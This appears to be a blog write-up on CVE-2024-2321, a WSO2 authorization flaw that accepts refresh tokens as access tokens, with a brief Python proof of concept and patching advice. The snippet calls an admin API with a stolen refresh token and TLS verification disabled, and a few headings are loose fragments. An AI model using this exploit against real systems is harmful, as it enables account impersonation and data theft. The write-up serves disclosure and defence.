CVE-2024-2321 - Bypassing API Access Security in WSO2 Using Just a Refresh Token

---

WSO2 is a popular platform used by businesses and developers to manage APIs, identity, and access. If you’re running WSO2 API Manager, Identity Server, or Enterprise Integrator, you need to pay attention: CVE-2024-2321 opens up a serious security hole that can let attackers sneak into your protected APIs—no password, no session cookie needed. Let’s break down what happened, how the bug works, and how it can be exploited.

What is CVE-2024-2321?

CVE-2024-2321 highlights an _incorrect authorization_ issue in several WSO2 products. Normally, sensitive or protected APIs in these systems should only be accessible using a valid *access token* along with session cookies, all verified with proper authorization logic. However, due to flaws in how WSO2 handles tokens and verifies user permissions, someone can access protected APIs using just a *refresh token*—no valid session or access token required.

WSO2 Enterprise Integrator

Original WSO2 Security Advisory:
https://wso2.com/security/2024/CVE-2024-2321

NVD Entry:
https://nvd.nist.gov/vuln/detail/CVE-2024-2321

Refresh token: Long-lived, used to get a new access token without re-authenticating.

The bug:
Due to improper authorization logic in WSO2, the API backend does not correctly check whether the submitted token is an *access* token or a *refresh* token. The backend also fails to enforce the need for a valid session cookie.

An attacker who possesses a valid *refresh token* (for example, taken from browser localStorage, logs, or via XSS/phishing) can directly call protected APIs—getting the kind of access that should only be possible with an access token and a valid session cookie. Since refresh tokens last longer, the attacker may have a persistent window of opportunity.

Code Snippet: Exploiting the Vulnerability

Here’s a Python snippet that demonstrates the bug. Assume the attacker already has a valid refresh_token (stolen from an admin):

import requests

# Target WSO2 API endpoint (protected API)
api_url = 'https://wso2.example.com/api/admin/users';

# Attacker's stolen refresh token
refresh_token = 'eyJraWQiOi...S8O1Zg'  # (example JWT refresh token)

# Insecurely using the refresh token as if it's an access token
headers = {
    'Authorization': f'Bearer {refresh_token}'
}

# No session cookie is included!
response = requests.get(api_url, headers=headers, verify=False)

print(response.status_code)
print(response.text)

Result:
If unpatched, the API responds with sensitive data or allows privileged operations, completely bypassing expected access controls.

Data confidentiality and integrity are at risk

If an admin’s refresh token is leaked, an attacker can essentially impersonate that admin, perform dangerous operations, and maintain persistence until the token expires or is revoked.

How Attackers Get Refresh Tokens

- Cross-Site Scripting (XSS): If your web app leaks tokens via XSS, attackers may steal them from browser storage.

Phishing: Convincing an admin to reveal their token.

- Misconfigured logs/system leaks: Tokens logged in server/application logs or exposed in memory dumps.

Mitigation

WSO2 has provided patches and guidance.
If you’re running any affected version, _update now_!

See the original WSO2 advisory for the latest patches and configuration changes

- WSO2 Official Security Advisory

References

- WSO2 Security Advisory: CVE-2024-2321
- NVD CVE-2024-2321 Entry
- OAuth 2. Threat Model and Security Considerations (RFC 6819)

TL;DR

CVE-2024-2321 is an authorization flaw in WSO2 that allows protected APIs to be accessed with just a refresh token—no access token or session required. If attackers get a refresh token (which lives longer than access tokens), they can perform unauthorized operations. Patch and review your tokens—now!

Timeline

Published on: 02/27/2025 05:15:13 UTC